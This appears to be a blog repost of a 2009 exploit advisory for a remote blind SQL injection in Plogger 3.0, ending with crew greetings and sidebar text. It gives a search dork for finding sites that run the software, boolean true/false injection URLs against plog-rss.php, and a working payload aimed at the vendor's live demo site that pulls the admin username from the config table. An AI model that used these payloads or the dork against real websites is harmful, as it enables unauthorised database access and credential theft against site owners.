o--::-::-::-@NG3L@-::-::-::--o: Plogger 3.0

============================================

[0] Plogger 3.0 Remote Blind SQL Injection Vulnerability

Software : Plogger 3.0
Vendor : http://www.plogger.org/
Author : Angela Chang
Contact : angel@ch4ng.cc
Date : 11 August 2009
================================================

[o] Dork

"Powered by Plogger"

[+] Vulnerabilities
http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=1 <-- true
http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=2 <-- false

[o] Demo Site

http://www.plogger.org/demo/plog-rss.php?level=collection&id=2%20and%20substring((SELECT%20admin_username%20FROM%20plogger_config%20LIMIT%200,1),1,5)=char(97,100,109,105,110)

================================================

[o] Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001

===============================================

o--::-::-::-@NG3L@-::-::-::--o

Plogger 3.0

0 komentar:

Posting Komentar

-::- Your Country -::-

-::- About Me -::-

-::- Archive -::-

-::- Labels -::-

-::- Tools -::-

-::- Links -::-

-::- Chat Box -::-

-::- Hit CounTer -::-